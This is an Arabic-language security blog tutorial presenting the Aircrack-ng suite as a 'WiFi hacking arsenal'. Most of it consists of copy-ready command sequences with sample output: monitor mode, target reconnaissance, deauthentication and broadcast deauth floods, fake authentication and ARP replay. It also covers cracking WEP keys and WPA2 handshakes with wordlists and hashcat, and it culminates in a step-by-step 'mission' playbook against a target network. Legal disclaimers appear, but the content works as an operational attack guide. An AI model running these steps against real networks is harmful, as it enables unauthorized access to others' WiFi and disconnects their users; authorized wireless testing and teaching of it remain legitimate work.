هكذا يخترق الهاكرز شبكة WiFi في أقل من 5 دقائق — Aircrack-ng بالتفصيل

هكذا يخترق الهاكرز شبكة WiFi في أقل من 5 دقائق — Aircrack-ng بالتفصيل

Aircrack-ng Suite — أسلحة اختراق WiFi | GloSecLab
// WIRELESS WARFARE SUITE — CLASSIFIED //

Aircrack-ng
ترسانة اختراق WiFi الكاملة

الدليل الأكثر تفصيلاً عن Aircrack-ng Suite — من تفعيل Monitor Mode إلى كسر WPA2 — كل أداة، كل خيار، كل هجوم

MONITOR: ACTIVE
INJECTION: READY
TARGET: LOCKED
GloSecLab
SCROLL DOWN
// 01 — INTRODUCTION
01

ما هي Aircrack-ng Suite؟

مجموعة الأسلحة المتكاملة لاختراق الشبكات اللاسلكية

Aircrack-ng هي مجموعة أدوات متكاملة (Suite) مفتوحة المصدر مخصصة لاختبار أمان الشبكات اللاسلكية. تشمل أدوات لالتقاط الـ Packets وحقنها وتحليلها وكسر تشفير WEP/WPA/WPA2. وهي المعيار الذهبي في Wireless Penetration Testing منذ 2006.

تأتي مثبتة افتراضياً في Kali Linux وParrot OS. كتبها Thomas d'Otreppe de Bouvette، وتعمل على مستوى Layer 2 من نموذج OSI — أي تتعامل مباشرة مع الـ Raw 802.11 Frames.

القوة في Wireless Pentesting97%
سهولة الاستخدام للمبتدئين72%
تغطية البروتوكولات WEP/WPA/WPA290%
⚠️ تحذير قانوني: استخدام Aircrack-ng على شبكات لا تمتلك إذناً صريحاً باختبارها هو جريمة جنائية. استخدمها فقط على شبكاتك الخاصة أو في بيئات تدريبية مثل HackTheBox وTryHackMe.
// 02 — ARSENAL
02

الترسانة الكاملة

كل أداة لها دور محدد في المعركة

📡
AIRMON-NG
// STEALTH MODE ACTIVATOR
تفعيل/إيقاف Monitor Mode. الخطوة الأولى الإلزامية قبل أي عملية.
👁️
AIRODUMP-NG
// RECONNAISSANCE ENGINE
مسح الشبكات، التقاط Raw Packets، جمع معلومات الـ APs والعملاء، وحفظ Handshakes.
💥
AIREPLAY-NG
// PACKET INJECTION WEAPON
حقن الـ Packets وشن هجمات Deauth وFake Auth وARP Replay. 11 نوع هجوم مختلف.
🔓
AIRCRACK-NG
// ENCRYPTION BREAKER
كسر مفاتيح WEP وWPA/WPA2 من ملفات الـ Capture بـ Dictionary وPTW Attack.
🗄️
AIROLIB-NG
// PMK DATABASE ENGINE
حساب وتخزين الـ PMKs مسبقاً لتسريع كسر WPA/WPA2 لاحقاً بشكل كبير.
🛡️
AIRBASE-NG
// EVIL TWIN CREATOR
إنشاء Access Points وهمية لهجمات MitM والـ Social Engineering.
🔍
AIRDECAP-NG
// PACKET DECRYPTOR
فك تشفير WEP/WPA Packets لتحليل محتوى الـ Traffic الملتقط.
📊
AIRGRAPH-NG
// NETWORK VISUALIZER
رسم خرائط بيانية مرئية للشبكات المكتشفة وعلاقتها بالعملاء.
🌐
AIRSERV-NG
// REMOTE CARD SERVER
TCP/IP Server يتيح مشاركة كارت WiFi واحد بين عدة أجهزة عبر الشبكة.
🔧
PACKETFORGE-NG
// PACKET FORGER
إنشاء Packets مشفرة مخصصة لهجمات الحقن المتقدمة على WEP.
// 03 — SETUP
03

التثبيت والمتطلبات

جهّز ترسانتك قبل المعركة

🎯 المتطلب الأساسي: كارت شبكة يدعم Monitor Mode وPacket Injection. الأفضل: Alfa AWUS036ACH، Alfa AWUS036AXML، أو TP-Link TL-WN722N v1.
// INSTALLATION
# الكارت في Kali — مثبتة مسبقاً root@kali:~$ aircrack-ng --version # تثبيت يدوي root@kali:~$ sudo apt update && sudo apt install aircrack-ng -y # التحقق من دعم Monitor Mode root@kali:~$ iw list | grep "monitor" * monitor # اختبار Injection root@kali:~$ aireplay-ng -9 wlan0mon Injection is working!
// 04 — AIRMON-NG
04

Airmon-ng — تفعيل Monitor Mode

وضع التخفي — استمع لكل شيء حولك

Airmon-ng تُحوّل الكارت من Managed Mode (يستقبل فقط ما هو موجّه له) إلى Monitor Mode (يلتقط كل الـ Frames في الهواء). هذا الوضع هو شرط أساسي لاستخدام باقي الأدوات.

// AIRMON-NG — Full Reference
# عرض كروت الشبكة root@kali:~$ airmon-ng PHY Interface Driver Chipset phy0 wlan0 ath9k_htc Atheros # إيقاف العمليات المتعارضة (NetworkManager, wpa_supplicant) root@kali:~$ airmon-ng check kill Killing: NetworkManager (789), wpa_supplicant (821) # تفعيل Monitor Mode root@kali:~$ airmon-ng start wlan0 [+] wlan0mon created → Monitor mode enabled # تفعيل على Channel محدد root@kali:~$ airmon-ng start wlan0 6 # التحقق من الوضع root@kali:~$ iwconfig wlan0mon Mode:Monitor Frequency:2.412 GHz # إيقاف Monitor Mode root@kali:~$ airmon-ng stop wlan0mon root@kali:~$ service NetworkManager start # طريقة يدوية بديلة root@kali:~$ ip link set wlan0 down root@kali:~$ iw dev wlan0 set type monitor root@kali:~$ ip link set wlan0 up
💡 Pro Tip: إذا ظهرت مشاكل، جرّب إعادة تشغيل الكارت: airmon-ng stop wlan0mon && airmon-ng start wlan0
// 05 — AIRODUMP-NG
05

Airodump-ng — الاستطلاع الميداني

ابصر العدو قبل أن تهاجم

Airodump-ng تلتقط الـ Raw 802.11 Frames وتعرض: SSID، BSSID، Channel، Encryption، Signal، والعملاء المتصلين. كما تحفظ الـ Capture Files التي تحتوي على الـ Handshakes.

// AIRODUMP-NG — Full Commands
# مسح شامل لكل الشبكات root@kali:~$ airodump-ng wlan0mon # مسح 5GHz فقط root@kali:~$ airodump-ng --band a wlan0mon # مسح 2.4 + 5GHz معاً root@kali:~$ airodump-ng --band abg wlan0mon # استهداف شبكة + حفظ Capture (الأهم) # -c Channel | --bssid MAC الراوتر | -w اسم الملف root@kali:~$ airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /tmp/capture wlan0mon # حفظ IVs فقط (أصغر — للـ WEP) root@kali:~$ airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap --ivs wlan0mon # فلترة بالـ ESSID root@kali:~$ airodump-ng --essid "TargetNetwork" wlan0mon # Output بصيغ متعددة root@kali:~$ airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w out --output-format pcap,csv wlan0mon

BSSID — MAC address الـ AP  |  PWR — قوة الإشارة (قريب من 0 = أقوى)  |  CH — القناة  |  ENC — نوع التشفير  |  CIPHER — خوارزمية التشفير  |  AUTH — PSK أو MGT

💡 دائماً استخدم -w: لا تنسَ حفظ الـ Capture! إذا التقطت الـ Handshake بدون -w ستخسره عند الإغلاق.
// 06 — AIREPLAY-NG
06

Aireplay-ng — 11 سلاح للهجوم

حقن الحزم وشن الضربات

Aireplay-ng هي أداة الهجوم المتعدد — تدعم 11 Attack Mode مختلفاً، كل منها لهدف محدد في الميدان.

الـ Flagاسم الهجومالوصف والاستخدام
-0 --deauthDEAUTHENTICATIONفصل عميل أو كل العملاء لإجبارهم على إعادة الاتصال وإنتاج Handshake
-1 --fakeauthFAKE AUTHENTICATIONمصادقة وهمية مع الـ AP — ضروري لهجمات WEP
-2 --interactiveINTERACTIVE REPLAYاختيار يدوي لـ Packet وإعادة حقنها
-3 --arpreplayARP REPLAYالتقاط وإعادة حقن ARP Requests لتوليد IVs — أفضل هجوم WEP
-4 --chopchopKoreK CHOPCHOPفك تشفير WEP Packet بدون مفتاح عبر تقنية ChopChop
-5 --fragmentFRAGMENTATIONالحصول على PRGA لإنشاء Packets مشفرة بدون المفتاح
-6 --caffe-latteCAFFE-LATTEهجوم WEP يستهدف العملاء البعيدين عن الـ AP
-7 --cfragCLIENT FRAGMENTFragment Attack بدون الحاجة لـ AP قريب
-8 --migmodeMICHAEL MIC FAILUREاستغلال ثغرة Michael MIC في TKIP/WPA
-9 --testINJECTION TESTاختبار قدرة الكارت على الـ Injection ومدى الاتصال
-0bBEACON FLOODإرسال آلاف Fake Beacons لإغراق الـ WiFi Scanners
// AIREPLAY-NG — Essential Attacks
## TEST INJECTION — أول شيء دائماً root@kali:~$ aireplay-ng -9 wlan0mon Injection is working! ## DEAUTH — فصل عميل محدد # -0 10 = 10 حزمة | -a = BSSID | -c = MAC العميل root@kali:~$ aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon ## DEAUTH BROADCAST — فصل كل العملاء root@kali:~$ aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0mon [!] -0 0 = هجوم مستمر حتى الإيقاف يدوياً ## FAKE AUTH — للـ WEP root@kali:~$ aireplay-ng -1 0 -e "TargetNet" -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon Association successful :-) ## ARP REPLAY — لتسريع IVs للـ WEP root@kali:~$ aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon Saving ARP requests in replay_arp.cap Read 2493 packets (got 312 ARP requests), sent 1305 packets... ## CHOPCHOP — فك تشفير WEP بدون مفتاح root@kali:~$ aireplay-ng -4 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
// 07 — AIRCRACK-NG
07

Aircrack-ng — كسر التشفير

الضربة الأخيرة — فك المفتاح

Aircrack-ng تكسر مفاتيح WEP وWPA/WPA2 من الـ Capture Files. للـ WEP تستخدم PTW Attack وFMS/KoreK Attack، وللـ WPA/WPA2 تستخدم Dictionary Attack على الـ 4-Way Handshake.

// AIRCRACK-NG — Cracking Commands
## WPA2 — Dictionary Attack root@kali:~$ aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF /tmp/capture-01.cap Opening /tmp/capture-01.cap # BSSID ESSID Encryption 1 AA:BB:CC:DD:EE:FF TargetNet WPA (1 handshake) KEY FOUND! [ password123 ] ## WPA2 — عدة Wordlists root@kali:~$ aircrack-ng -w rockyou.txt,darkweb.txt -b AA:BB:CC:DD:EE:FF cap-01.cap ## WPA2 — مع تعدد الـ CPUs root@kali:~$ aircrack-ng -p 4 -w rockyou.txt -b AA:BB:CC:DD:EE:FF cap-01.cap ## WEP — PTW Method (الأسرع) root@kali:~$ aircrack-ng capture-01.cap ## WEP — FMS/KoreK Method root@kali:~$ aircrack-ng -K capture-01.cap ## حفظ المفتاح في ملف root@kali:~$ aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF -l found_key.txt cap-01.cap
الـ Flagالوصف
-w FILEWordlist لهجوم WPA/WPA2
-b BSSIDتحديد MAC الـ AP المستهدف
-e ESSIDتحديد اسم الشبكة
-KFMS/KoreK method للـ WEP
-zPTW method للـ WEP (الافتراضي)
-n BITSطول مفتاح WEP: 64، 128، أو 256
-p NUMعدد الـ CPUs المستخدمة
-l FILEحفظ المفتاح المكتشف في ملف
-qQuiet Mode — النتيجة فقط
-a 1/2إجبار WEP (1) أو WPA (2)
// 08 — FULL MISSION
08

المهمة الكاملة — WPA2 من الصفر للنهاية

السيناريو الحربي خطوة بخطوة

// PHASE 01 — ACTIVATE

تفعيل Monitor Mode

إيقاف العمليات المتعارضة وتحويل الكارت لوضع الاستطلاع الشامل.

// PHASE 02 — RECON

استطلاع الهدف

مسح كل الشبكات وجمع: BSSID، Channel، عدد العملاء المتصلين.

// PHASE 03 — LOCK ON

تثبيت الاستطلاع على الهدف

تركيز Airodump-ng على الشبكة المستهدفة وبدء حفظ الـ Capture File.

// PHASE 04 — STRIKE

هجوم Deauth لإنتاج الـ Handshake

فصل عميل متصل لإجباره على إعادة الاتصال وإنتاج الـ 4-Way Handshake.

// PHASE 05 — CRACK

كسر الهاش — Mission Complete

تشغيل Aircrack-ng أو Hashcat على الـ Capture File مع Wordlist مناسبة.

// FULL WPA2 MISSION — Complete Playbook
######## PHASE 01 — ACTIVATE ######## root@kali:~$ airmon-ng check kill root@kali:~$ airmon-ng start wlan0 [+] wlan0mon — Monitor mode active ######## PHASE 02 — RECON ######## root@kali:~$ airodump-ng wlan0mon BSSID PWR CH ENC ESSID AA:BB:CC:DD:EE:FF -58 6 WPA2 TargetNetwork # لاحظ BSSID + CH ثم اضغط Ctrl+C ######## PHASE 03 — LOCK ON ######## root@kali:~$ airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /tmp/target wlan0mon # اتركه يعمل — افتح Terminal جديد ######## PHASE 04 — STRIKE (Terminal 2) ######## root@kali:~$ aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon # في Terminal 1 انتظر: [ WPA handshake: AA:BB:CC:DD:EE:FF ] # اضغط Ctrl+C لإيقاف Airodump-ng ######## PHASE 05 — CRACK ######## # خيار 1: Aircrack-ng (CPU) root@kali:~$ aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF /tmp/target-01.cap # خيار 2: Hashcat (GPU — أسرع بكثير) root@kali:~$ hcxpcapngtool -o /tmp/h.hc22000 /tmp/target-01.cap root@kali:~$ hashcat -m 22000 -a 0 /tmp/h.hc22000 rockyou.txt -r rules/best64.rule KEY FOUND! [ mysecretpassword ]
// 09 — WEP ATTACK
09

هجوم WEP — الهدف الأسهل

بروتوكول ميت يسقط في دقائق

WEP منسوخ تماماً لكن لا يزال موجوداً في بعض الأجهزة القديمة. كسره يحتاج جمع 40,000 إلى 85,000 IV — وبـ ARP Replay يمكن الوصول لهذا الرقم في دقائق.

// WEP FULL ATTACK
## T1: استهداف + جمع IVs root@kali:~$ airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w wep --ivs wlan0mon ## T2: Fake Auth root@kali:~$ aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon Association successful :-) ## T3: ARP Replay — توليد IVs بسرعة root@kali:~$ aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon Read 2493 packets (got 1 ARP requests), sent 1305 packets... ## T4: الكسر بعد 40k+ IVs root@kali:~$ aircrack-ng wep-01.ivs Aircrack-ng 1.7 [00:00:04] Tested 15234 keys (got 58291 IVs) KEY FOUND! [ 12:34:56:78:90 ]
2
// 10 — FIELD INTEL
10

نصائح الميدان

ما لا تعلمه الكتب

⚡ ابدأ دائماً بـ Injection Test: aireplay-ng -9 wlan0mon — إذا فشل الحقن لن تنجح أي هجمات.
📶 قرب الهدف حاسم: PWR بين -30 و-65 مثالي. أقل من -80 يعني إشارة ضعيفة جداً.
🔄 Deauth فاشل؟ جرّب تغيير MAC: macchanger -r wlan0mon ثم أعد المحاولة.
🤝 لا Handshake؟ انتظر عميلاً يتصل تلقائياً، أو جرّب -0 0 لـ Broadcast Deauth.
⚡ Hashcat > Aircrack-ng للكسر: حوّل الـ .cap بـ hcxpcapngtool واستخدم GPU — أسرع بعشرات المرات.
📁 احفظ كل شيء: دائماً -w filename في Airodump-ng. الـ Handshake لا يُعاد التقاطه.
🔧 wlan0mon اختفى بعد Reboot؟ طبيعي — Monitor Mode مؤقت. أعد تفعيله مع كل جلسة.
⚠️ أخلاقيات الميدان: كل ما في هذا المقال للتعليم والاختبار الأخلاقي فقط. استخدم هذه المعرفة لحماية الشبكات لا لاختراقها.

// PENETRATION TESTING · KALI LINUX · OSINT //

© 2026 GloSecLab — للأغراض التعليمية والأخلاقية فقط